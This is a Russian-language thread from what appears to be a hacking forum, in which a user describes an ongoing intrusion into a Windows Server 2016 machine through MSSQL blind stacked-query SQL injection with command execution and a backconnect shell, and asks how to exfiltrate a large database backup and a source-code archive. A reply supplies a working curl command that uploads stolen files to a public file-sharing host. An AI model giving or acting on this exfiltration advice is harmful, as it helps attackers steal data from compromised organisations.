• XSS.stack #1 – первый литературный журнал от юзеров форума

mssql, нужен совет по доставке payload

Frame

RAID-массив
Пользователь
Регистрация
05.05.2021
Сообщения
58
Реакции
55
Вводные: есть SQL Injection, MSSQL, Blind Stacked Queries (DNS Exfiltration), DBA = OS-SHELL (RCE, USER)
OS Name: Microsoft Windows Server 2016 Datacenter
OS Version: 10.0.14393 N/A Build 14393

Задача: выкачать всю бд (приоритет) и некоторые интересующие файлы с сервера.

Дампить через SQL inj, не вариант, даты много.
Кинул backconnect на свою впс-ку, доступ к cmd есть. (non-interactive shell)

И вот встал вопрос по выгрузке данных с сервака. Я могу сделать бекап бд и записать его на диск. В итоге нужно выкачать 2 больших файла: БД и zip с исходниками.

На уме несколько вариантов:
1. какой-то C2 фреймворк
2. сделать FTP сервак и загрузить файлы на него через CURL
3. колупать хост, повышать права, и потом выкачивать

Прошу совета как это лучше всего реализовать или куда копать (гуглить)

ps: сори за название темы, переосмыслил вопрос что хочу задать, а редачить не могу
 
не знаю поможет ли, я качал файлы с помощью курла и файлообменника temp.sh, все до ужаса просто, "curl -T file.zip temp.sh", но я не знаю какие у тебя размеры, там файлы до 2гб только берут
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх